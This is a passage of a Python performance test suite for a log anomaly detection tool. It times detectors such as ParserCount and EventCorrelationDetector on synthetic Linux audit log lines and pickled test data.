DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: r = random.randint(0, len(log_lines)-1) line = log_lines[r] log_atom = LogAtom( line, ParserMatch(parsing_model.get_match_element('parser', MatchContext(line))), t + i, self.__class__.__name__) measured_time += timeit.timeit(lambda: new_match_id_value_combo_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_id_value_combo_detector.__class__.__name__, avg, results, '%.2f seconds min_allowed_time_diff.' % min_allowed_time_diff) def run_parser_count(self, set_path_list, report_after_number_of_elements): """Run the performance tests for ParserCount.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00' b' nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 ' b'a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 ' b'tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)'] parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: if set_path_list: parser_count = ParserCount(self.aminer_config, ['parser/type/path/name', 'parser/type/syscall/syscall'], [ self.stream_printer_event_handler], report_after_number_of_elements) else: parser_count = ParserCount(self.aminer_config, None, [self.stream_printer_event_handler], report_after_number_of_elements) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: r = random.randint(0, len(log_lines) - 1) line = log_lines[r] log_atom = LogAtom(line, ParserMatch(parsing_model.get_match_element('parser', MatchContext(line))), t + i, self.__class__.__name__) measured_time += timeit.timeit(lambda: parser_count.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( parser_count.__class__.__name__, avg, results, 'set_path_list: %s, report_after_number_of_elements: %d' % (set_path_list, report_after_number_of_elements)) def run_event_correlation_detector(self, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis): """Run the performance tests for EventCorrelationDetector.""" alphabet = b'abcdefghijklmnopqrstuvwxyz' children = [] for i, char in enumerate(alphabet): char = bytes([char]) children.append(FixedDataModelElement(char.decode(), char)) alphabet_model = FirstMatchModelElement('first', children) # training phase results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], generation_factor=generation, generation_probability=generation, max_hypotheses=max_hypotheses, max_observations=max_observations, p0=p0, alpha=alpha, candidates_size=candidates_size, hypotheses_eval_delta_time=hypothesis_eval_delta_time, delta_time_to_discard_hypothesis=delta_time_to_discard_hypothesis) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: char = bytes([alphabet[i % len(alphabet)]]) parser_match = ParserMatch(alphabet_model.get_match_element('parser', MatchContext(char))) t += diff measured_time += timeit.timeit(lambda: ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( ecd.__class__.__name__, avg, results, 'learn_mode: %s, generation: %.2f, diff: %.2f, p0: %.2f, alpha: %.2f, max_hypothesis: %d, max_observations: %d, candid' 'ates_size %d, hypothesis_eval_delta_time: %.2f, delta_time_to_discard_hypothesis: %.2f' % ( ecd.learn_mode, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis)) # check_phase results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: ecd.learn_mode = False t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: char = bytes([alphabet[i % len(alphabet)]]) parser_match = ParserMatch(alphabet_model.get_match_element('parser', MatchContext(char))) t += diff measured_time += timeit.timeit(lambda: ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( ecd.__class__.__name__, avg, results, 'learn_mode: %s, generation: %.2f, diff: %.2f, p0: %.2f, alpha: %.2f, max_hypothesis: %d, max_observations: %d, candid' 'ates_size %d, hypothesis_eval_delta_time: %.2f, delta_time_to_discard_hypothesis: %.2f' % ( ecd.learn_mode, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis)) def run_match_filter(self, number_of_paths): """Run the performance tests for MatchFilter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) match_filter = MatchFilter(self.aminer_config, ['d' + str(i) for i in range(number_of_paths)], [ self.stream_printer_event_handler]) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, match_filter) measured_time += timeit.timeit(lambda: match_filter.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( match_filter.__class__.__name__, avg, results, 'a %s and %d different path(s).' % (new_match_path_detector.__class__.__name__, number_of_paths)) def run_event_type_detector(self, number_of_paths): """Run the performance tests for EventTypeDetector.""" with open('unit/data/vtd_data/uni_data_test6', 'rb') as f: uni_data_list = pickle.load(f) with open('unit/data/vtd_data/nor_data_test6', 'rb') as f: nor_data_list = pickle.load(f) with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f: beta1_data_list = pickle.load(f) with open('unit/data/vtd_data/uni_data_test7', 'rb') as f: [uni_data_list_ini, uni_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/nor_data_test7', 'rb') as f: [nor_data_list_ini, nor_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f: [beta1_data_list_ini, beta1_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f: [beta2_data_list_ini, beta2_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f: [beta3_data_list_ini, beta3_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f: [beta4_data_list_ini, beta4_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f: [beta5_data_list_ini, beta5_data_list_upd, _, _] = pickle.load(f) data = uni_data_list + nor_data_list + beta1_data_list + uni_data_list_ini + uni_data_list_upd + nor_data_list_ini +\ nor_data_list_upd + beta1_data_list_ini + beta1_data_list_upd + beta2_data_list_ini + beta2_data_list_upd + beta3_data_list_ini\ + beta3_data_list_upd + beta4_data_list_ini + beta4_data_list_upd + beta5_data_list_ini + beta5_data_list_upd results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: path_list = None if number_of_paths is not None and number_of_paths != 1000000: path_list = ['/integer/d' + str(i) for i in range(number_of_paths)] else: number_of_paths = 1000000 event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths)) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(data[i % len(data)]).encode()) match_element = any_byte_data_me.get_match_element('/integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector) measured_time += timeit.timeit(lambda: event_type_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations if number_of_paths == 1000000: number_of_paths = 'all' type(self).result = self.result + self.result_string % ( event_type_detector.__class__.__name__, avg, results, '%s different path(s).' % (str(number_of_paths))) def run_variable_type_detector(self, number_of_paths): """Run the performance tests for VariableTypeDetector.""" with open('unit/data/vtd_data/uni_data_test6', 'rb') as f: uni_data_list = pickle.load(f) with open('unit/data/vtd_data/nor_data_test6', 'rb') as f: nor_data_list = pickle.load(f) with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f: beta1_data_list = pickle.load(f) with open('unit/data/vtd_data/uni_data_test7', 'rb') as f: [uni_data_list_ini, uni_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/nor_data_test7', 'rb') as f: [nor_data_list_ini, nor_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f: [beta1_data_list_ini, beta1_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f: [beta2_data_list_ini, beta2_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f: [beta3_data_list_ini, beta3_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f: [beta4_data_list_ini, beta4_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f: [beta5_data_list_ini, beta5_data_list_upd, _, _] = pickle.load(f) data = uni_data_list + nor_data_list + beta1_data_list + uni_data_list_ini + uni_data_list_upd + nor_data_list_ini +\ nor_data_list_upd + beta1_data_list_ini + beta1_data_list_upd + beta2_data_list_ini + beta2_data_list_upd + beta3_data_list_ini\ + beta3_data_list_upd + beta4_data_list_ini + beta4_data_list_upd + beta5_data_list_ini + beta5_data_list_upd results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: path_list = None if number_of_paths is not None and number_of_paths != 1000000: path_list = ['/integer/d' + str(i) for i in range(number_of_paths)] else: number_of_paths = 1000000 event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list) variable_type_detector = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], event_type_detector, target_path_list=path_list) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths)) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(data[i % len(data)]).encode()) match_element = any_byte_data_me.get_match_element('/integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector) self.assertTrue(event_type_detector.receive_atom(log_atom)) measured_time += timeit.timeit(lambda: variable_type_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations if number_of_paths == 1000000: number_of_paths = 'all' type(self).result = self.result + self.result_string % ( variable_type_detector.__class__.__name__, avg, results, '%s different path(s).' % (str(number_of_paths))) def run_variable_correlation_detector(self, number_of_paths): """Run the performance tests for VariableCorrelationDetector.""" with open('unit/data/vtd_data/uni_data_test6', 'rb') as f: uni_data_list = pickle.load(f) with open('unit/data/vtd_data/nor_data_test6', 'rb') as f: nor_data_list = pickle.load(f) with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f: beta1_data_list = pickle.load(f) with open('unit/data/vtd_data/uni_data_test7', 'rb') as f: [uni_data_list_ini, uni_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/nor_data_test7', 'rb') as f: [nor_data_list_ini, nor_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f: [beta1_data_list_ini, beta1_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f: [beta2_data_list_ini, beta2_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f: [beta3_data_list_ini, beta3_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f: [beta4_data_list_ini, beta4_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f: [beta5_data_list_ini, beta5_data_list_upd, _, _] = pickle.load(f) data = uni_data_list + nor_data_list + beta1_data_list + uni_data_list_ini + uni_data_list_upd + nor_data_list_ini +\ nor_data_list_upd + beta1_data_list_ini + beta1_data_list_upd + beta2_data_list_ini + beta2_data_list_upd + beta3_data_list_ini\ + beta3_data_list_upd + beta4_data_list_ini + beta4_data_list_upd + beta5_data_list_ini + beta5_data_list_upd results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: path_list = None if number_of_paths is not None and number_of_paths != 1000000: path_list = ['/integer/d' + str(i) for i in range(number_of_paths)] else: number_of_paths = 1000000 event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list) variable_correlation_detector = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], event_type_detector) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths)) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(data[i % len(data)]).encode()) match_element = any_byte_data_me.get_match_element('/integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector) self.assertTrue(event_type_detector.receive_atom(log_atom)) measured_time += timeit.timeit(lambda: variable_correlation_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations if number_of_paths == 1000000: number_of_paths = 'all' type(self).result = self.result + self.result_string % ( variable_correlation_detector.__class__.__name__, avg, results, '%s different path(s).' % (str(number_of_paths))) def run_event_frequency_detector(self, number_of_paths): """Run the performance tests for EventFrequencyDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) target_path_list = None if number_of_paths is not None: target_path_list = ['d' + str(i) for i in range(number_of_paths)] efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=target_path_list) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: if number_of_paths is None: path = 'd' + str(i) else: path = 'd' + str(i % number_of_paths) decimal_integer_value_me = DecimalIntegerValueModelElement( path, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, efd) measured_time += timeit.timeit(lambda: efd.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( efd.__class__.__name__, avg, results, 'a %s and %s different path(s).' % (new_match_path_detector.__class__.__name__, str(number_of_paths))) def run_event_sequence_detector(self, number_of_paths): """Run the performance tests for EventFrequencyDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) id_path_list = None if number_of_paths is not None: id_path_list = ['d' + str(i) for i in range(number_of_paths)] esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=id_path_list) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: if number_of_paths is None: path = 'd' + str(i) else: path = 'd' + str(i % number_of_paths) decimal_integer_value_me = DecimalIntegerValueModelElement( path, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, esd) measured_time += timeit.timeit(lambda: esd.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( esd.__class__.__name__, avg, results, 'a %s and %s different path(s).' % (new_match_path_detector.__class__.__name__, str(number_of_paths))) def test01atom_filters(self): """Start performance tests for AtomFilters.""" self.run_atom_filters_match_path_filter(1) self.run_atom_filters_match_path_filter(30) self.run_atom_filters_match_path_filter(100) self.run_atom_filters_match_value_filter(1) self.run_atom_filters_match_value_filter(30) self.run_atom_filters_match_value_filter(100) def test02enhanced_new_match_path_value_combo_detector(self): """Start performance tests for EnhancedNewMatchPathValueComboDetector.""" self.run_enhanced_new_match_path_value_combo_detector(1) self.run_enhanced_new_match_path_value_combo_detector(30) self.run_enhanced_new_match_path_value_combo_detector(100) def test03histogram_analysis(self): """Start performance tests for HistogramAnalysis.""" self.run_histogram_analysis(1, 100) self.run_histogram_analysis(30, 100) self.run_histogram_analysis(100, 100) self.run_histogram_analysis(10000, 100) self.run_histogram_analysis(1, 1000) self.run_histogram_analysis(30, 1000) self.run_histogram_analysis(100, 1000) self.run_histogram_analysis(10000, 1000) self.run_histogram_analysis(1, 10000) self.run_histogram_analysis(30, 10000) self.run_histogram_analysis(100, 10000) self.run_histogram_analysis(10000, 10000) def test04match_value_average_change_detector(self): """Start performance tests for MatchValueAverageChangeDetector.""" self.run_match_value_average_change_detector(1) self.run_match_value_average_change_detector(30) self.run_match_value_average_change_detector(100) def test05match_value_stream_writer(self): """Start performance tests for MatchValueStreamWriter.""" self.run_match_value_stream_writer(1) self.run_match_value_stream_writer(30) self.run_match_value_stream_writer(100) def test06missing_match_path_value_detector(self): """Start performance tests for MissingMatchPathValueDetector.""" self.run_missing_match_path_value_detector(1) self.run_missing_match_path_value_detector(30) self.run_missing_match_path_value_detector(100) def test07new_match_path_detector(self): """Start performance tests for NewMatchPathDetector.""" self.run_new_match_path_detector(1) self.run_new_match_path_detector(1000) self.run_new_match_path_detector(100000) def test08new_match_path_value_combo_detector(self): """Start performance tests for NewMatchPathValueComboDetector.""" self.run_new_match_path_value_combo_detector(1) self.run_new_match_path_value_combo_detector(30) self.run_new_match_path_value_combo_detector(100) def test09new_match_path_value_detector(self): """Start performance tests for NewMatchPathValueDetector.""" self.run_new_match_path_value_detector(1) self.run_new_match_path_value_detector(30) self.run_new_match_path_value_detector(100) def test10time_correlation_detector(self): """Start performance tests for TimeCorrelationDetector.""" self.run_time_correlation_detector(10) self.run_time_correlation_detector(100) self.run_time_correlation_detector(1000) def test11time_correlation_violation_detector(self): """Start performance tests for TimeCorrelationViolationDetector.""" self.run_time_correlation_violation_detector(0.99) self.run_time_correlation_violation_detector(0.95) self.run_time_correlation_violation_detector(0.50) self.run_time_correlation_violation_detector(0.01) def test12timestamp_correction_filters(self): """Start performance tests for TimestampCorrectionFilters.""" self.run_timestamp_correction_filters(1) self.run_timestamp_correction_filters(1000) self.run_timestamp_correction_filters(100000) def test13timestamps_unsorted_detector(self): """Start performance tests for TimestampsUnsortedDetector.""" self.run_timestamps_unsorted_detector(0.001) self.run_timestamps_unsorted_detector(0.1) self.run_timestamps_unsorted_detector(1) self.run_timestamps_unsorted_detector(100) def test14allowlist_violation_detector(self): """Start performance tests for AllowlistViolationDetector.""" self.run_allowlist_violation_detector(1, 99) self.run_allowlist_violation_detector(1, 50) self.run_allowlist_violation_detector(1, 1) self.run_allowlist_violation_detector(1000, 99) self.run_allowlist_violation_detector(1000, 50) self.run_allowlist_violation_detector(1000, 1) self.run_allowlist_violation_detector(100000, 99) self.run_allowlist_violation_detector(100000, 50) self.run_allowlist_violation_detector(100000, 1) def test15new_match_id_value_combo_detector(self): """Start performance tests for NewMatchIdValueComboDetector.""" self.run_new_match_id_value_combo_detector(0.1) self.run_new_match_id_value_combo_detector(5) self.run_new_match_id_value_combo_detector(20) self.run_new_match_id_value_combo_detector(100) def test16parser_count(self): """Start performance tests for ParserCount.""" # use path self.run_parser_count(True, 60) self.run_parser_count(True, 1000) self.run_parser_count(True, 10000) self.run_parser_count(True, 100000) # use no path 